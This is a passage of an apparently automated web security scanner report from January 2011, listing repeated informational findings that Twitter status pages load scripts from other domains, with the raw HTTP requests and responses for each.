<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.487. http://twitter.com/malsup/status/30232367046074369 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30232367046074369

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/30232367046074369 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234400-48992-50295
ETag: "9486b3a58f9159bf530c7065952ec746"
Last-Modified: Fri, 28 Jan 2011 17:06:40 GMT
X-Runtime: 0.04718
Content-Type: text/html; charset=utf-8
Content-Length: 13553
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDIzMjM2NzA0NjA3NDM2OToVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--cd5eee6cb518814e2c3a4b98f170590e4598280c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.488. http://twitter.com/malsup/status/30232367046074369 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30232367046074369

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/30232367046074369 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224742-9041-16904
ETag: "d3e65130366342526ec8ade660cf3dbb"
Last-Modified: Fri, 28 Jan 2011 14:25:42 GMT
X-Runtime: 0.04768
Content-Type: text/html; charset=utf-8
Content-Length: 13683
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDIzMjM2NzA0NjA3NDM2OToMY3NyZl9pZCIlYTM3MGRmOTZhODQz%250AM2RiNDBlMmY1M2I5OTM2NjFmYjE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e05cd9620525d156ee51f67a18a4e6ea60c33e75; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.489. http://twitter.com/malsup/status/30417132269346816 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30417132269346816

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224742-7004-30272
ETag: "da9e6ffc8f0c311694071739765bd753"
Last-Modified: Fri, 28 Jan 2011 14:25:42 GMT
X-Runtime: 0.04299
Content-Type: text/html; charset=utf-8
Content-Length: 13699
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxNzEzMjI2OTM0NjgxNjoMY3NyZl9pZCIlYzFhNDVhNDY0ZjBj%250ANTkyYTUyYTU1YjI1ZjJjN2VmZDg6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--1619ced3ca9bc9fa08b4a84d7d647b1b47a62ad4; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.490. http://twitter.com/malsup/status/30417132269346816 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30417132269346816

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225101-41543-21577
ETag: "7b3eddf287ab880dd7a3113b68b2ae49"
Last-Modified: Fri, 28 Jan 2011 14:31:41 GMT
X-Runtime: 0.05135
Content-Type: text/html; charset=utf-8
Content-Length: 13700
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxNzEzMjI2OTM0NjgxNjoMY3NyZl9pZCIlMzIxYmVmNDFhZTU5%250AMGY0MTQ1YTRkZTNiYmE4OGQ2ODk6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--1ddcef71856cb3184cfbcaf3f2798f69a1792a8a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.491. http://twitter.com/malsup/status/30418291201679360 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30418291201679360

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224740-43275-1259
ETag: "b36130e1f840ffcb8130031180af8a87"
Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT
X-Runtime: 0.07149
Content-Type: text/html; charset=utf-8
Content-Length: 13636
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxODI5MTIwMTY3OTM2MDoMY3NyZl9pZCIlNjZjMzQ2MThjNmJl%250ANjFjN2ZmMzBjNjgyMTNiYzQ1N2Q6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--be54aaa7f049891a1ab52a41024afae2053a60f4; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.492. http://twitter.com/malsup/status/30418291201679360 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30418291201679360

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225100-52222-37669
ETag: "0fa32a91d15f92fcebba9baa0646a0c0"
Last-Modified: Fri, 28 Jan 2011 14:31:40 GMT
X-Runtime: 0.05194
Content-Type: text/html; charset=utf-8
Content-Length: 13637
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxODI5MTIwMTY3OTM2MDoMY3NyZl9pZCIlMTg0OWQwOTc5ODU4%250AZmRkOWExNmFhYTc3MTMyNzg4M2U6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--776398d5267902388309984475063a2748d72923; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.493. http://twitter.com/malsup/status/30442842241376256 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30442842241376256

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/30442842241376256 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224740-54021-29414
ETag: "c768dc702745a41fcbc487b93ba7b1d0"
Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT
X-Runtime: 0.05060
Content-Type: text/html; charset=utf-8
Content-Length: 13590
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQ0Mjg0MjI0MTM3NjI1NjoMY3NyZl9pZCIlMTdjZmE5ZGJlZjVk%250AM2JkM2I0YWIyZDA1MzE3NTdhYjE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--eff563544b6e766e02e277b4b06265fffbf2e5f3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.494. http://twitter.com/malsup/status/30442842241376256 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30442842241376256

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/30442842241376256 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234387-93691-58325
ETag: "62764e954595cf3f36708f8dcf4c2e1d"
Last-Modified: Fri, 28 Jan 2011 17:06:27 GMT
X-Runtime: 0.08150
Content-Type: text/html; charset=utf-8
Content-Length: 13459
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
